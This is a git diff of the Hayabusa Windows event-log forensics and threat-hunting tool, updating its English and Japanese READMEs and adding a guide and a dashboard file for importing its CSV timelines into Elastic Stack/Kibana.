diff --git a/README-Japanese.md b/README-Japanese.md index 7c1b86a3..be8d893b 100644 --- a/README-Japanese.md +++ b/README-Japanese.md @@ -18,7 +18,7 @@ # Hayabusa について -Hayabusaは、日本の[Yamato Security](https://yamatosecurity.connpass.com/)グループによって作られた**Windowsイベントログのファストフォレンジックタイムライン生成**および**スレットハンティングツール**です。 Hayabusaは日本語で[「ハヤブサ」](https://en.wikipedia.org/wiki/Peregrine_falcon)を意味し、ハヤブサが世界で最も速く、狩猟(hunting)に優れ、とても訓練しやすい動物であることから選ばれました。[Rust](https://www.rust-lang.org/) で開発され、マルチスレッドに対応し、可能な限り高速に動作するよう配慮されています。[Sigma](https://github.com/SigmaHQ/Sigma)ルールをHayabusaルール形式に変換する[ツール](https://github.com/Yamato-Security/hayabusa-rules/tree/main/tools/sigmac)も提供しています。Hayabusaの検知ルールもSigmaと同様にYML形式であり、カスタマイズ性や拡張性に優れます。稼働中のシステムで実行してライブ調査することも、複数のシステムからログを収集してオフライン調査することも可能です。(※現時点では、リアルタイムアラートや定期的なスキャンには対応していません。) 出力は一つのCSVタイムラインにまとめられ、Excelや[Timeline Explorer](https://ericzimmerman.github.io/#!index.md)で簡単に分析できるようになります。 +Hayabusaは、日本の[Yamato Security](https://yamatosecurity.connpass.com/)グループによって作られた**Windowsイベントログのファストフォレンジックタイムライン生成**および**スレットハンティングツール**です。 Hayabusaは日本語で[「ハヤブサ」](https://en.wikipedia.org/wiki/Peregrine_falcon)を意味し、ハヤブサが世界で最も速く、狩猟(hunting)に優れ、とても訓練しやすい動物であることから選ばれました。[Rust](https://www.rust-lang.org/) で開発され、マルチスレッドに対応し、可能な限り高速に動作するよう配慮されています。[Sigma](https://github.com/SigmaHQ/Sigma)ルールをHayabusaルール形式に変換する[ツール](https://github.com/Yamato-Security/hayabusa-rules/tree/main/tools/sigmac)も提供しています。Hayabusaの検知ルールもSigmaと同様にYML形式であり、カスタマイズ性や拡張性に優れます。稼働中のシステムで実行してライブ調査することも、複数のシステムからログを収集してオフライン調査することも可能です。(※現時点では、リアルタイムアラートや定期的なスキャンには対応していません。) 出力は一つのCSVタイムラインにまとめられ、Excel、[Timeline Explorer](https://ericzimmerman.github.io/#!index.md)、[Elastic Stack](doc/ElasticStackImport/ElasticStackImport-English.md)等で簡単に分析できるようになります。 ## 目次 
@@ -34,6 +34,7 @@ Hayabusaは、日本の[Yamato Security](https://yamatosecurity.connpass.com/) - [Excelでの解析:](#excelでの解析) - [Timeline Explorerでの解析:](#timeline-explorerでの解析) - [Criticalアラートのフィルタリングとコンピュータごとのグルーピング:](#criticalアラートのフィルタリングとコンピュータごとのグルーピング) + - [Elastic Stackダッシュボード](#elastic-stackダッシュボード) - [タイムラインのサンプル結果](#タイムラインのサンプル結果) - [特徴&機能](#特徴機能) - [予定されている機能](#予定されている機能) @@ -54,6 +55,7 @@ Hayabusaは、日本の[Yamato Security](https://yamatosecurity.connpass.com/) - [ピボットキーワードの作成](#ピボットキーワードの作成) - [サンプルevtxファイルでHayabusaをテストする](#サンプルevtxファイルでhayabusaをテストする) - [Hayabusaの出力](#hayabusaの出力) + - [MITRE ATT&CK戦術の省略](#mitre-attck戦術の省略) - [プログレスバー](#プログレスバー) - [標準出力へのカラー設定](#標準出力へのカラー設定) - [Hayabusaルール](#hayabusaルール) @@ -76,7 +78,7 @@ Hayabusaは、日本の[Yamato Security](https://yamatosecurity.connpass.com/) ### スレット(脅威)ハンティング -Hayabusa には現在、1300以上のSigmaルールと約70のHayabusa検知ルールがあり、定期的にルールが追加されています。 最終的な目標はインシデントレスポンスや定期的なスレットハンティングのために、HayabusaエージェントをすべてのWindows端末にインストールして、中央サーバーにアラートを返す仕組みを作ることです。 +Hayabusaには現在、2200以上のSigmaルールと約125のHayabusa検知ルールがあり、定期的にルールが追加されています。 最終的な目標はインシデントレスポンスや定期的なスレットハンティングのために、HayabusaエージェントをすべてのWindows端末にインストールして、中央サーバーにアラートを返す仕組みを作ることです。 ### フォレンジックタイムラインの高速生成 
@@ -108,16 +110,24 @@ Windowsのイベントログは、 ![Hayabusa Timeline Explorerでの解析](screenshots/TimelineExplorer-ColoredTimeline.png) -## Criticalアラートのフィルタリングとコンピュータごとのグルーピング: +## Criticalアラートのフィルタリングとコンピュータごとのグルーピング: ![Timeline ExplorerでCriticalアラートのフィルタリングとコンピュータグルーピング](screenshots/TimelineExplorer-CriticalAlerts-ComputerGrouping.png) +## Elastic Stackダッシュボード + +![Elastic Stack Dashboard 1](doc/ElasticStackImport/17-HayabusaDashboard-1.png) + +![Elastic Stack Dashboard 2](doc/ElasticStackImport/18-HayabusaDashboard-2.png) + # タイムラインのサンプル結果 CSVのタイムライン結果のサンプルは[こちら](https://github.com/Yamato-Security/hayabusa/tree/main/sample-results)で確認できます。 CSVのタイムラインをExcelやTimeline Explorerで分析する方法は[こちら](doc/CSV-AnalysisWithExcelAndTimelineExplorer-Japanese.pdf)で紹介しています。 +CSVのタイムラインをElastic Stackにインポートする方法は[こちら](doc/ElasticStackImport/ElasticStackImport-English.md)で紹介しています。(現在、英語のみ) + # 特徴&機能 * クロスプラットフォーム対応: Windows, Linux, macOS。 @@ -132,15 +142,13 @@ CSVのタイムラインをExcelやTimeline Explorerで分析する方法は[こ * MITRE ATT&CKとのマッピング (CSVの出力ファイルのみ)。 * ルールレベルのチューニング。 * イベントログから不審なユーザやファイルを素早く特定するのに有用な、ピボットキーワードの一覧作成。 +* 詳細な調査のために全フィールド情報の出力。 # 予定されている機能 * すべてのエンドポイントでの企業全体のスレットハンティング。 -* 日本語対応。 * MITRE ATT&CKのヒートマップ生成機能。 * ユーザーログオンと失敗したログオンのサマリー。 -* JSONログからの入力。 -* JSONへの出力→Elastic Stack/Splunkへのインポート。 # ダウンロード @@ -292,6 +300,7 @@ macOSの環境設定から「セキュリティとプライバシー」を開き USAGE: -d --directory=[DIRECTORY] '.evtxファイルを持つディレクトリのパス。' -f --filepath=[FILEPATH] '1つの.evtxファイルのパス。' + -F --full-data '全てのフィールド情報を出力する。' -r --rules=[RULEFILE/RULEDIRECTORY] 'ルールファイルまたはルールファイルを持つディレクトリ。(デフォルト: ./rules)' -c --color 'カラーで出力する。 (ターミナルはTrue Colorに対応する必要がある。)' -C --config=[RULECONFIGDIRECTORY] 'ルールフォルダのコンフィグディレクトリ(デフォルト: ./rules/config)' 
@@ -330,10 +339,10 @@ hayabusa.exe -f eventlog.evtx hayabusa.exe -d .\hayabusa-sample-evtx ``` -* 1つのCSVファイルにエクスポートして、ExcelやTimeline Explorerでさらに分析することができます: +* 全てのフィールド情報も含めて1つのCSVファイルにエクスポートして、Excel、Timeline Explorer、Elastic Stack等でさらに分析することができます: ```bash -hayabusa.exe -d .\hayabusa-sample-evtx -o results.csv +hayabusa.exe -d .\hayabusa-sample-evtx -o results.csv -F ``` * Hayabusaルールのみを実行します(デフォルトでは `-r .\rules` にあるすべてのルールが利用されます): @@ -456,11 +465,34 @@ Hayabusaの結果を標準出力に表示しているとき(デフォルト) * `Title`: YML検知ルールの`title`フィールドから来ています。 * `Details`: YML検知ルールの`details`フィールドから来ていますが、このフィールドはHayabusaルールにしかありません。このフィールドはアラートとイベントに関する追加情報を提供し、ログの``部分から有用なデータを抽出することができます。 -CSVファイルとして保存する場合、以下の2つのフィールドが追加されます: +CSVファイルとして保存する場合、以下の列が追加されます: +* `MitreAttack`: MITRE ATT&CKの戦術。 * `Rule Path`: アラートまたはイベントを生成した検知ルールへのパス。 * `File Path`: アラートまたはイベントを起こしたevtxファイルへのパス。 +`-F`もしくは`--full-data`オプションを指定した場合、全てのフィールド情報が新しいカラムで出力されます。 + +## MITRE ATT&CK戦術の省略 + +簡潔に出力するためにMITRE ATT&CKの戦術を以下のように省略しています。 +`config/output_tag.txt`の設定ファイルで自由に編集できます。 + +* `Recon` : Reconnaissance (偵察) +* `ResDev` : Resource Development (リソース開発) +* `InitAccess` : Initial Access (初期アクセス) +* `Exec` : Execution (実行) +* `Persis` : Persistence (永続化) +* `PrivEsc` : Privilege Escalation (権限昇格) +* `Evas` : Defense Evasion (防御回避) +* `CredAccess` : Credential Access (認証情報アクセス) +* `Disc` : Discovery (探索) +* `LatMov` : Lateral Movement (横展開) +* `Collect` : Collection (収集) +* `C2` : Command and Control (遠隔操作) +* `Exfil` : Exfiltration (持ち出し) +* `Impact` : Impact (影響) + ## プログレスバー プログレス・バーは、複数のevtxファイルに対してのみ機能します。 
@@ -502,11 +534,14 @@ Hayabusaルールのディレクトリ構造は、3つのディレクトリに ## Hayabusa v.s. 変換されたSigmaルール -Sigmaルールは、最初にHayabusaルール形式に変換する必要があります。変換のやり方は[ここ](https://github.com/Yamato-Security/hayabusa-rules/tree/main/tools/sigmac/README-Japanese.md)で説明されています。Hayabusaルールは、Windowsのイベントログ解析専用に設計されており、以下のような利点があります: +Sigmaルールは、最初にHayabusaルール形式に変換する必要があります。変換のやり方は[ここ](https://github.com/Yamato-Security/hayabusa-rules/tree/main/tools/sigmac/README-Japanese.md)で説明されています。 +殆どのルールはSigmaルールと互換性があるので、Sigmaルールのようにその他のSIEM形式に変換できます。 +Hayabusaルールは、Windowsのイベントログ解析専用に設計されており、以下のような利点があります: 1. ログの有用なフィールドのみから抽出された追加情報を表示するための `details`フィールドを追加しています。 2. Hayabusaルールはすべてサンプルログに対してテストされ、検知することが確認されています。 > 変換処理のバグ、サポートされていない機能、実装の違い(正規表現など)により、一部のSigmaルールは意図したとおりに動作しない可能性があります。 +3. Sigmaルール仕様にない集計式(例:`|equalsfield`)の利用。 **制限事項**: 私たちの知る限り、Hayabusa はオープンソースの Windows イベントログ解析ツールの中でSigmaルールを最も多くサポートしていますが、まだサポートされていないルールもあります。 diff --git a/README.md b/README.md index 350585ad..07a69398 100644 --- a/README.md +++ b/README.md 
@@ -18,7 +18,7 @@ # About Hayabusa -Hayabusa is a **Windows event log fast forensics timeline generator** and **threat hunting tool** created by the [Yamato Security](https://yamatosecurity.connpass.com/) group in Japan. Hayabusa means ["peregrine falcon"](https://en.wikipedia.org/wiki/Peregrine_falcon") in Japanese and was chosen as peregrine falcons are the fastest animal in the world, great at hunting and highly trainable. It is written in [Rust](https://www.rust-lang.org/) and supports multi-threading in order to be as fast as possible. We have provided a [tool](https://github.com/Yamato-Security/hayabusa-rules/tree/main/tools/sigmac) to convert [sigma](https://github.com/SigmaHQ/sigma) rules into hayabusa rule format. The hayabusa detection rules, like sigma, are also written in YML in order to be as easily customizable and extensible as possible. It can be run either on running systems for live analysis or by gathering logs from multiple systems for offline analysis. (At the moment, it does not support real-time alerting or periodic scans.) The output will be consolidated into a single CSV timeline for easy analysis in Excel or [Timeline Explorer](https://ericzimmerman.github.io/#!index.md). +Hayabusa is a **Windows event log fast forensics timeline generator** and **threat hunting tool** created by the [Yamato Security](https://yamatosecurity.connpass.com/) group in Japan. Hayabusa means ["peregrine falcon"](https://en.wikipedia.org/wiki/Peregrine_falcon") in Japanese and was chosen as peregrine falcons are the fastest animal in the world, great at hunting and highly trainable. It is written in [Rust](https://www.rust-lang.org/) and supports multi-threading in order to be as fast as possible. We have provided a [tool](https://github.com/Yamato-Security/hayabusa-rules/tree/main/tools/sigmac) to convert [sigma](https://github.com/SigmaHQ/sigma) rules into hayabusa rule format. 
The hayabusa detection rules are based on sigma rules, written in YML in order to be as easily customizable and extensible as possible. It can be run either on running systems for live analysis or by gathering logs from multiple systems for offline analysis. (At the moment, it does not support real-time alerting or periodic scans.) The output will be consolidated into a single CSV timeline for easy analysis in Excel, [Timeline Explorer](https://ericzimmerman.github.io/#!index.md), or [Elastic Stack](doc/ElasticStackImport/ElasticStackImport-English.md). ## Table of Contents @@ -34,7 +34,8 @@ Hayabusa is a **Windows event log fast forensics timeline generator** and **thre - [Analysis in Excel](#analysis-in-excel) - [Analysis in Timeline Explorer](#analysis-in-timeline-explorer) - [Critical Alert Filtering and Computer Grouping in Timeline Explorer](#critical-alert-filtering-and-computer-grouping-in-timeline-explorer) -- [Sample Timeline Results](#sample-timeline-results) + - [Elastic Stack Dashboard](#elastic-stack-dashboard) +- [Analyzing Sample Timeline Results](#analyzing-sample-timeline-results) - [Features](#features) - [Planned Features](#planned-features) - [Downloads](#downloads) @@ -54,6 +55,7 @@ Hayabusa is a **Windows event log fast forensics timeline generator** and **thre - [Pivot Keyword Generator](#pivot-keyword-generator) - [Testing Hayabusa on Sample Evtx Files](#testing-hayabusa-on-sample-evtx-files) - [Hayabusa Output](#hayabusa-output) + - [MITRE ATT&CK Tactics Abbreviations](#mitre-attck-tactics-abbreviations) - [Progress Bar](#progress-bar) - [Color Output](#color-output) - [Hayabusa Rules](#hayabusa-rules) 
@@ -76,7 +78,7 @@ Hayabusa is a **Windows event log fast forensics timeline generator** and **thre ### Threat Hunting -Hayabusa currently has over 1300 sigma rules and around 70 hayabusa rules with more rules being added regularly. The ultimate goal is to be able to push out hayabusa agents to all Windows endpoints after an incident or for periodic threat hunting and have them alert back to a central server. +Hayabusa currently has over 2200 sigma rules and around 125 hayabusa rules with more rules being added regularly. The ultimate goal is to be able to push out hayabusa agents to all Windows endpoints after an incident or for periodic threat hunting and have them alert back to a central server. ### Fast Forensics Timeline Generation @@ -110,12 +112,20 @@ Hayabusa is not intended to be a replacement for tools like [Evtx Explorer](http ![Critical alert filtering and computer grouping in Timeline Explorer](screenshots/TimelineExplorer-CriticalAlerts-ComputerGrouping.png) -# Sample Timeline Results +## Elastic Stack Dashboard -You can check out sample CSV timelines [here](https://github.com/Yamato-Security/hayabusa/tree/main/sample-results). +![Elastic Stack Dashboard 1](doc/ElasticStackImport/17-HayabusaDashboard-1.png) + +![Elastic Stack Dashboard 2](doc/ElasticStackImport/18-HayabusaDashboard-2.png) + +# Analyzing Sample Timeline Results + +You can check out a sample CSV timeline [here](https://github.com/Yamato-Security/hayabusa/tree/main/sample-results). You can learn how to analyze CSV timelines in Excel and Timeline Explorer [here](doc/CSV-AnalysisWithExcelAndTimelineExplorer-English.pdf). +You can learn how to import CSV files into Elastic Stack [here](doc/ElasticStackImport/ElasticStackImport-English.md). + # Features * Cross-platform support: Windows, Linux, macOS. 
@@ -124,21 +134,19 @@ You can learn how to analyze CSV timelines in Excel and Timeline Explorer [here] * Creates a single easy-to-analyze CSV timeline for forensic investigations and incident response. * Threat hunting based on IoC signatures written in easy to read/create/edit YML based hayabusa rules. * Sigma rule support to convert sigma rules to hayabusa rules. -* Currently it supports the most sigma rules compared to other similar tools and even supports count rules. +* Currently it supports the most sigma rules compared to other similar tools and even supports count rules and new aggregators such as `|equalsfield`. * Event log statistics. (Useful for getting a picture of what types of events there are and for tuning your log settings.) * Rule tuning configuration by excluding unneeded or noisy rules. * MITRE ATT&CK mapping of tactics (only in saved CSV files). * Rule level tuning. * Create a list of unique pivot keywords to quickly identify abnormal users, hostnames, processes, etc... as well as correlate events. +* Output all fields for more thorough investigations. # Planned Features * Enterprise-wide hunting on all endpoints. -* Japanese language support. * MITRE ATT&CK heatmap generation. * User logon and failed logon summary. -* Input from JSON logs. -* JSON support for sending alerts to Elastic Stack/Splunk, etc... # Downloads @@ -210,7 +218,7 @@ sudo yum install openssl-devel ## Advanced: Updating Rust Packages -You can update to the latest Rust crates before compiling to get the latest libraries: +You can update to the latest Rust crates before compiling: ```bash cargo update 
@@ -285,6 +293,7 @@ You should now be able to run hayabusa. USAGE: -d --directory=[DIRECTORY] 'Directory of multiple .evtx files.' -f --filepath=[FILEPATH] 'File path to one .evtx file.' + -F --full-data 'Print all field information.' -r --rules=[RULEFILE/RULEDIRECTORY] 'Rule file or directory. (Default: ./rules)' -c --color 'Output with color. (Terminal needs to support True Color.)' -C --config=[RULECONFIGDIRECTORY] 'Rule config folder. (Default: ./rules/config)' @@ -323,10 +332,10 @@ hayabusa.exe -f eventlog.evtx hayabusa.exe -d .\hayabusa-sample-evtx ``` -* Export to a single CSV file for further analysis with excel or timeline explorer: +* Export to a single CSV file for further analysis with excel, timeline explorer, elastic stack, etc... and include all field information: ```bash -hayabusa.exe -d .\hayabusa-sample-evtx -o results.csv +hayabusa.exe -d .\hayabusa-sample-evtx -o results.csv -F ``` * Only run hayabusa rules (the default is to run all the rules in `-r .\rules`): 
@@ -449,11 +458,34 @@ When hayabusa output is being displayed to the screen (the default), it will dis * `Title`: This comes from the `title` field in the YML detection rule. * `Details`: This comes from the `details` field in the YML detection rule, however, only hayabusa rules have this field. This field gives extra information about the alert or event and can extract useful data from the `` portion of the log. For example, usernames, command line information, process information, etc... -When saving to a CSV file an additional two fields will be added: +The following additional columns will be added to the output when saving to a CSV file: +* `MitreAttack`: MITRE ATT&CK tactics. * `Rule Path`: The path to the detection rule that generated the alert or event. * `File Path`: The path to the evtx file that caused the alert or event. +If you add the `-F` or `--full-data` option, a new column with all field information will also be added. + +## MITRE ATT&CK Tactics Abbreviations + +In order to save space, we use the following abbreviations when displaying MITRE ATT&CK tactics. +You can freely edit these abbreviations in the `config/output_tag.txt` configuration file. + +* `Recon` : Reconnaissance +* `ResDev` : Resource Development +* `InitAccess` : Initial Access +* `Exec` : Execution +* `Persis` : Persistence +* `PrivEsc` : Privilege Escalation +* `Evas` : Defense Evasion +* `CredAccess` : Credential Access +* `Disc` : Discovery +* `LatMov` : Lateral Movement +* `Collect` : Collection +* `C2` : Command and Control +* `Exfil` : Exfiltration +* `Impact` : Impact + ## Progress Bar The progress bar will only work with multiple evtx files. 
@@ -480,7 +512,7 @@ The hayabusa rule directory structure is separated into 3 directories: * `default`: logs that are turned on in Windows by default. * `non-default`: logs that need to be turned on through group policy, security baselines, etc... * `sysmon`: logs that are generated by [sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon). -* `testing`: a temporary directory to put rules that you are currently testing +* `testing`: a temporary directory to put rules that you are currently testing. Rules are further seperated into directories by log type (Example: Security, System, etc...) and are named in the following format: 
@@ -493,11 +525,14 @@ Please check out the current rules to use as a template in creating new ones or ## Hayabusa v.s. Converted Sigma Rules -Sigma rules need to first be converted to hayabusa rule format explained [here](https://github.com/Yamato-Security/hayabusa-rules/blob/main/tools/sigmac/README.md). Hayabusa rules are designed solely for Windows event log analysis and have the following benefits: +Sigma rules need to first be converted to hayabusa rule format explained [here](https://github.com/Yamato-Security/hayabusa-rules/blob/main/tools/sigmac/README.md). +Most rules are compatible with the sigma format so you can use them just like sigma rules to convert to other SIEM formats. +Hayabusa rules are designed solely for Windows event log analysis and have the following benefits: 1. An extra `details` field to display additional information taken from only the useful fields in the log. 2. They are all tested against sample logs and are known to work. > Some sigma rules may not work as intended due to bugs in the conversion process, unsupported features, or differences in implementation (such as in regular expressions). +3. Extra aggregators not found in sigma, such as `|equalsfield`. **Limitations**: To our knowledge, hayabusa provides the greatest support for sigma rules out of any open source Windows event log analysis tool, however, there are still rules that are not supported: diff --git a/doc/ElasticStackImport/01-SOF-ELK-Bootup.png b/doc/ElasticStackImport/01-SOF-ELK-Bootup.png new file mode 100644 index 00000000..b37c8e31 Binary files /dev/null and b/doc/ElasticStackImport/01-SOF-ELK-Bootup.png differ diff --git a/doc/ElasticStackImport/02-Kibana.png b/doc/ElasticStackImport/02-Kibana.png new file mode 100644 index 00000000..7a70aab7 Binary files /dev/null and b/doc/ElasticStackImport/02-Kibana.png differ 
diff --git a/doc/ElasticStackImport/03-Integrations.png b/doc/ElasticStackImport/03-Integrations.png new file mode 100644 index 00000000..719e2ee6 Binary files /dev/null and b/doc/ElasticStackImport/03-Integrations.png differ diff --git a/doc/ElasticStackImport/04-IntegrationsImportCSV.png b/doc/ElasticStackImport/04-IntegrationsImportCSV.png new file mode 100644 index 00000000..de835d7b Binary files /dev/null and b/doc/ElasticStackImport/04-IntegrationsImportCSV.png differ diff --git a/doc/ElasticStackImport/05-OverrideSettings.png b/doc/ElasticStackImport/05-OverrideSettings.png new file mode 100644 index 00000000..dd4926e0 Binary files /dev/null and b/doc/ElasticStackImport/05-OverrideSettings.png differ diff --git a/doc/ElasticStackImport/06-OverrideSettingsConfig.png b/doc/ElasticStackImport/06-OverrideSettingsConfig.png new file mode 100644 index 00000000..b18ddb10 Binary files /dev/null and b/doc/ElasticStackImport/06-OverrideSettingsConfig.png differ diff --git a/doc/ElasticStackImport/07-CSV-Import.png b/doc/ElasticStackImport/07-CSV-Import.png new file mode 100644 index 00000000..e9a49c87 Binary files /dev/null and b/doc/ElasticStackImport/07-CSV-Import.png differ diff --git a/doc/ElasticStackImport/08-ImportDataSettings.png b/doc/ElasticStackImport/08-ImportDataSettings.png new file mode 100644 index 00000000..c4f9374c Binary files /dev/null and b/doc/ElasticStackImport/08-ImportDataSettings.png differ diff --git a/doc/ElasticStackImport/09-ImportFinish.png b/doc/ElasticStackImport/09-ImportFinish.png new file mode 100644 index 00000000..5397c31a Binary files /dev/null and b/doc/ElasticStackImport/09-ImportFinish.png differ diff --git a/doc/ElasticStackImport/10-Discover.png b/doc/ElasticStackImport/10-Discover.png new file mode 100644 index 00000000..acc4d1bf Binary files /dev/null and b/doc/ElasticStackImport/10-Discover.png differ 
diff --git a/doc/ElasticStackImport/11-Dashboard.png b/doc/ElasticStackImport/11-Dashboard.png new file mode 100644 index 00000000..4af4a7d6 Binary files /dev/null and b/doc/ElasticStackImport/11-Dashboard.png differ diff --git a/doc/ElasticStackImport/12-AddingColumns.png b/doc/ElasticStackImport/12-AddingColumns.png new file mode 100644 index 00000000..f52dae1e Binary files /dev/null and b/doc/ElasticStackImport/12-AddingColumns.png differ diff --git a/doc/ElasticStackImport/13-RecommendedColumns.png b/doc/ElasticStackImport/13-RecommendedColumns.png new file mode 100644 index 00000000..1b063368 Binary files /dev/null and b/doc/ElasticStackImport/13-RecommendedColumns.png differ diff --git a/doc/ElasticStackImport/14-DicoverWithColumns.png b/doc/ElasticStackImport/14-DicoverWithColumns.png new file mode 100644 index 00000000..ff69126a Binary files /dev/null and b/doc/ElasticStackImport/14-DicoverWithColumns.png differ diff --git a/doc/ElasticStackImport/15-HayabusaDashboard-StackManagement.png b/doc/ElasticStackImport/15-HayabusaDashboard-StackManagement.png new file mode 100644 index 00000000..222abec6 Binary files /dev/null and b/doc/ElasticStackImport/15-HayabusaDashboard-StackManagement.png differ diff --git a/doc/ElasticStackImport/16-HayabusaDashboard-Import.png b/doc/ElasticStackImport/16-HayabusaDashboard-Import.png new file mode 100644 index 00000000..d28485c1 Binary files /dev/null and b/doc/ElasticStackImport/16-HayabusaDashboard-Import.png differ diff --git a/doc/ElasticStackImport/17-HayabusaDashboard-1.png b/doc/ElasticStackImport/17-HayabusaDashboard-1.png new file mode 100644 index 00000000..5f5f2896 Binary files /dev/null and b/doc/ElasticStackImport/17-HayabusaDashboard-1.png differ diff --git a/doc/ElasticStackImport/18-HayabusaDashboard-2.png b/doc/ElasticStackImport/18-HayabusaDashboard-2.png new file mode 100644 index 00000000..0a5cee5e Binary files /dev/null and b/doc/ElasticStackImport/18-HayabusaDashboard-2.png differ 
diff --git a/doc/ElasticStackImport/ElasticStackImport-English.md b/doc/ElasticStackImport/ElasticStackImport-English.md new file mode 100644 index 00000000..4a8c96a3 --- /dev/null +++ b/doc/ElasticStackImport/ElasticStackImport-English.md 
@@ -0,0 +1,130 @@ +# Importing Results Into Elastic Stack + +## Start an elastic stack distribution + +Hayabusa results can easily be imported into Elastic Stack. We recommend using [SOF-ELK](https://github.com/philhagen/sof-elk/blob/main/VM_README.md), a free elastic stack Linux distro focused on DFIR investigations. + +First download and unzip the SOF-ELK 7-zipped VMware image from [http://for572.com/sof-elk-vm](http://for572.com/sof-elk-vm). + +* Username: `elk_user` +* Password: `forensics` + +When you boot up the VM, you will get a screen similar to below: + +![SOF-ELK Bootup](01-SOF-ELK-Bootup.png) + +Open Kibana in a web browser according to the URL displayed. For example: http://172.16.62.130:5601/ + +>> Note: it may take a while for Kibana to load. + +You should see a webpage as follows: + +![SOF-ELK Kibana](02-Kibana.png) + +## Import the CSV results + +Click the sidebar icon in top-lefthand corner and open `Integrations`. + +![Integrations](03-Integrations.png) + +Type in `csv` in the search bar and click `Upload a file`: + +![CSV Upload](04-IntegrationsImportCSV.png) + +After uploading the CSV file, click `Override settings` to specify the correct timestamp format: + +![Override Settings](05-OverrideSettings.png) + +As shown below, perform the following changes and then click `Apply`: + +1. Change `Timestamp format` to `custom`. +2. Specify the format as `yyyy-MM-dd HH:mm:ss.SSS XXX` +3. Change the `Time field` to `Timestamp`. + +![Override Settings Config](06-OverrideSettingsConfig.png) + +Now click `Import` in the bottom left-hand corner. + +![CSV Import](07-CSV-Import.png) + +As shown below, click on `Advanced` and perform the following settings before clicking `Import`: + +1. Title the `Index name` as `evtxlogs-hayabusa`. +2. Under `Index settings`, add `, "number_of_replicas": 0` so that the index health status does not turn yellow. +3. 
Under `Mappings`, change the `RuleTitle` type of `text` to `keyword` so that we can do statistics on the rule titles and change the `EventID` type of `long` to `keyword` in order to import without errors. +4. Under `Ingest pipeline`, add `, "field": "Timestamp"` under the `remove` section. Timestamps will be displayed as `@timestamp` so this duplicate field is not needed. Also, delete the following in order to import without errors: + ``` + { + "convert": { + "field": "EventID", + "type": "long", + "ignore_missing": true + } + }, + ``` + +Settings should look similar to below: + +![Import Data Settings](08-ImportDataSettings.png) + +After importing, you should receive something similar to below: + +![Import Finish](09-ImportFinish.png) + +You can now click `View index in Discover` to view the results. + +## Analyzing results + +The default Discover view should look similar to this: + +![Discover View](10-Discover.png) + +You can get an overview of when the events happened and frequency of events by looking at the histogram at top. + +In the left-side sidebar, you can add fields you want to display in the columns by clicking the plus sign after hovering over a field: + +![Adding Columns](12-AddingColumns.png) + +To start off, we recommend the following columns: + +![Recommended Columns](13-RecommendedColumns.png) + +Your Discover view should now look like this: + +![Discover With Columns](14-DicoverWithColumns.png) + +You can filter with KQL to search for certain events and alerts. For example: + * `Level: "critical"`: Just show critical alerts. + * `Level: "critical" or Level: "high"`: Show high and critical alerts. + * `NOT Level:info`: Do not show informational events, only alerts. + * `*LatMov*`: Show events and alerts related to lateral movement. + * `"Password Spray"`: Only show specific attacks such as "Password Spray". + * `"LID: 0x8724ead"`: Display all activity associated with Logon ID 0x8724ead. 
+ +## Hayabusa Dashboard + +We have exported a simple Hayabusa Dashboard in JSON to download [here](https://github.com/Yamato-Security/hayabusa/blob/main/doc/ElasticStackImport/HayabusaDashboard.ndjson) + +To import the dashboard, open the left sidebar and click `Stack Management` under `Management`. + +![Stack Management](15-HayabusaDashboard-StackManagement.png) + +After clicking `Saved Objects`, please click `Import` in the upper right-hand corner and import the Hayabusa Dashboard JSON file you downloaded. + +![Import Dashboard](16-HayabusaDashboard-Import.png) + +You should now be able to use the dashboard shown below: + +![Hayabusa Dashboard-1](17-HayabusaDashboard-1.png) + +![Hayabussa Dashboard-2](18-HayabusaDashboard-2.png) + +## Future Plans + +We plan on creating Hayabusa logstash parsers and a dashboard pre-built for SOF-ELK so that all you will need to do is copy the CSV results file to a directory in order to ingest the logs. + +## Acknowledgements + +Much of this documentation was taken from the blog write-up in Japanese from @kzzzzo2 [here](https://qiita.com/kzzzzo2/items/ead8ccc77b7609143749). + +Many thanks to @kzzzzo2! \ No newline at end of file diff --git a/doc/ElasticStackImport/HayabusaDashboard.ndjson b/doc/ElasticStackImport/HayabusaDashboard.ndjson new file mode 100644 index 00000000..262a8615 --- /dev/null +++ b/doc/ElasticStackImport/HayabusaDashboard.ndjson 
@@ -0,0 +1,4 @@ +{"attributes":{"fieldAttrs":"{\"Computer\":{\"count\":3},\"Details\":{\"count\":3},\"EventID\":{\"count\":3},\"Level\":{\"count\":4},\"MitreAttack\":{\"count\":3},\"RuleTitle\":{\"count\":3}}","fields":"[]","runtimeFieldMap":"{}","timeFieldName":"@timestamp","title":"evtxlogs-hayabusa","typeMeta":"{}"},"coreMigrationVersion":"7.17.1","id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","migrationVersion":{"index-pattern":"7.11.0"},"references":[],"type":"index-pattern","updated_at":"2022-04-15T00:28:01.828Z","version":"WzExNjAsM10="} +{"attributes":{"columns":["Computer","EventID","Level","MitreAttack","RuleTitle","Details"],"description":"","grid":{},"hideChart":false,"kibanaSavedObjectMeta":{"searchSourceJSON":"{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"},"sort":[["@timestamp","desc"]],"title":"Hayabusa Discover"},"coreMigrationVersion":"7.17.1","id":"d0e3ad60-bc6a-11ec-b4f7-8347b07fe863","migrationVersion":{"search":"7.9.3"},"references":[{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"kibanaSavedObjectMeta.searchSourceJSON.index","type":"index-pattern"}],"type":"search","updated_at":"2022-04-15T03:19:09.878Z","version":"WzE2NzAsM10="} +{"attributes":{"description":"","hits":0,"kibanaSavedObjectMeta":{"searchSourceJSON":"{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"},"optionsJSON":"{\"useMargins\":true,\"syncColors\":false,\"hidePanelTitles\":false}","panelsJSON":"[{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":0,\"y\":0,\"w\":12,\"h\":17,\"i\":\"1af33197-eac8-463d-ae7e-3b8a89568122\"},\"panelIndex\":\"1af33197-eac8-463d-ae7e-3b8a89568122\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Risk 
